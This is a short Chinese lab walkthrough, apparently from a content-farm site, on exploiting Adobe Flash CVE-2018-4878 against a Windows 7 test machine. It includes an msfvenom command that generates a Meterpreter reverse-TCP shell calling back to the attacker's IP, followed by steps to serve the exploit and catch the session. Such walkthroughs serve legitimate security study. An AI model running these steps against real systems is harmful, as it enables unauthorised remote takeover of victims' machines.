Adobe flash player 28漏洞攻击的分析

Adobe flash player 28漏洞攻击的分析，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。

Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。
攻击者通过构造特殊的Flash链接，当用户用浏览器/邮件/Office访问此Flash链接时，会触发漏洞，可直接getshell。准备工作：靶机信息：192.168.2.134（windows 7 SP1）Flash版本：28.0.0.137攻击机信息：192.168.2.132(kali linux)漏洞利用脚本：CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode，msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

2.替换原 cve-2018-4878.py中的shellcode，并修改参数stageless=False。

3.在代码中修改要生成的文件和路径。

4.执行修改后的cve-2018-4878.py文件，生成index和exploit两个文件。

5.将生成的两个文件复制到web目录环境下。

6.在kali的msf中启用监听。

7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html，kali中即可获取到靶机会话。

看完上述内容，你们掌握Adobe flash player 28漏洞攻击的分析的方法了吗？如果还想学到更多技能或想了解更多相关内容，欢迎关注行业资讯频道，感谢各位的阅读！